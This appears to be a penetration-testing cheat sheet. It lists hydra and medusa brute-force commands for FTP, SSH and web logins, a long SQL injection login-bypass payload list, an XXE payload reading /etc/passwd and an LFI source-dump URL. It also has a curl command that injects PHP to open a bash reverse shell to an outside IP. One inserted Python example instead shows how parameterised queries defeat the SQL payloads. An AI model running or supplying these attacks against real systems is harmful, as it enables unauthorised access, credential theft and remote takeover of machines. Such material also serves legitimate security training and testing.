Attacks

Brute force FTP

FTP server:

medusa -h 10.11.1.8 -u justine -P /usr/share/wordlists/rockyou.txt -M ftp 
hydra -L USER_LIST -P PASS_LIST -f -o /data/results/10.10.1.22/scans/10.10.1.22_21_ftphydra.txt -u 10.10.1.22 -s 21 ftp 

Brute force SSH

hydra -l justine -P /usr/share/wordlists/rockyou.txt -t 10 10.11.1.8 ssh -s 22 
medusa -u root -P /usr/share/wordlists/rockyou.txt -e ns -h 10.10.1.22 -n 22 -M ssh

SQL Injection

sheet with the Burp Suite Intruder Module. This list is an extended version of the SQL Login Bypass Cheat Sheet by Dr. Emin İslam Tatlı (OWASP Board Member).

root' --
root' #
root'/*
root' or '1'='1
root' or '1'='1'--
root' or '1'='1'#
root' or '1'='1'/*
root'or 1=1 or ''='
root' or 1=1
root' or 1=1--
root' or 1=1#
root' or 1=1/*
root') or ('1'='1
root') or ('1'='1'--
root') or ('1'='1'#
root') or ('1'='1'/*
root') or '1'='1
root') or '1'='1'--
root') or '1'='1'#
root') or '1'='1'/*
or 1=1
or 1=1--
or 1=1#
or 1=1/*
' or 1=1
' or 1=1--
' or 1=1#
' or 1=1/*
" or 1=1
" or 1=1--
" or 1=1#
" or 1=1/*
1234 ' AND 1=0 UNION ALL SELECT 'root', '81dc9bdb52d04dc20036dbd8313ed055
root" --
root" #
root"/*
root" or "1"="1
root" or "1"="1"--
root" or "1"="1"#
root" or "1"="1"/*
root" or 1=1 or ""="
root" or 1=1
root" or 1=1--
root" or 1=1#
root" or 1=1/*
root") or ("1"="1
root") or ("1"="1"--
root") or ("1"="1"#
root") or ("1"="1"/*
root") or "1"="1
root") or "1"="1"--
root") or "1"="1"#
root") or "1"="1"/*
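
Why the entries above work against a login query built by string concatenation, and why a parameterised query defeats them, shown as an added example (not from the original page). The `users` table, the MD5 hashing and the function names are assumptions made for the illustration, and SQLite is used so it runs offline.

```python
import hashlib
import sqlite3

# Constructed sample data: a single account. MD5 mirrors the hash format seen
# in the UNION entry of the list; it is not a suitable password hash.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, pw_hash TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)",
               ("root", hashlib.md5(b"S3cret!").hexdigest()))
    return db

def login_concat(db, username, password):
    """Vulnerable: the username is spliced into the SQL text."""
    pw = hashlib.md5(password.encode()).hexdigest()
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND pw_hash = '" + pw + "'")
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        # The spliced text no longer parses. SQL syntax errors raised from a
        # login form are worth logging and alerting on.
        return False

def login_param(db, username, password):
    """Hardened: input is bound as data and never parsed as SQL."""
    pw = hashlib.md5(password.encode()).hexdigest()
    sql = "SELECT username FROM users WHERE username = ? AND pw_hash = ?"
    return db.execute(sql, (username, pw)).fetchone() is not None

# Entries from the list above. The last one targets a query that wraps the
# username in parentheses, so it only breaks the syntax of this query.
PAYLOADS = ["root' --", "root' or '1'='1", "' or 1=1--", "root') or ('1'='1"]

def compare(db):
    """Map each entry to (vulnerable_result, hardened_result)."""
    return {p: (login_concat(db, p, "x"), login_param(db, p, "x"))
            for p in PAYLOADS}

if __name__ == "__main__":
    for payload, (vuln, safe) in compare(make_db()).items():
        print(f"{payload!r:22} concat={vuln} param={safe}")
```
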

XXE

<?xml version="1.0" encoding="UTF-8"?>

 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

<root><name>&xxe;</name><tel>test</tel><email>&xxe;</email><password>tst</password></root>

LFI

View the source of any PHP file (the filter returns it base64-encoded):

http://IP/index.php?m=php://filter/convert.base64-encode/resource=index

RFI

Null Bytes

http://10.11.1.24//classes/phpmailer/class.cs_phpmailer.php?classes_dir=/etc/passwd%00
curl -s --data "<?php system('bash -i >& /dev/tcp/172.16.237.245/4545 0>&1') ?>" "http://10.10.10.10/index.php?ACS_path=php://input%00"

Brute force Web

hydra 192.168.30.147 -l '' -P /usr/share/wordlists/fasttrack.txt -s 8080 http-form-post "/phpliteadmin.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect:H=Cookie\: PHPSESSID=bq8vrl6updklfdvv21reb8s63j"

htaccess brute force

medusa -h 192.168.1.101 -u admin -P wordlist.txt -M http -m DIR:/admin -T 10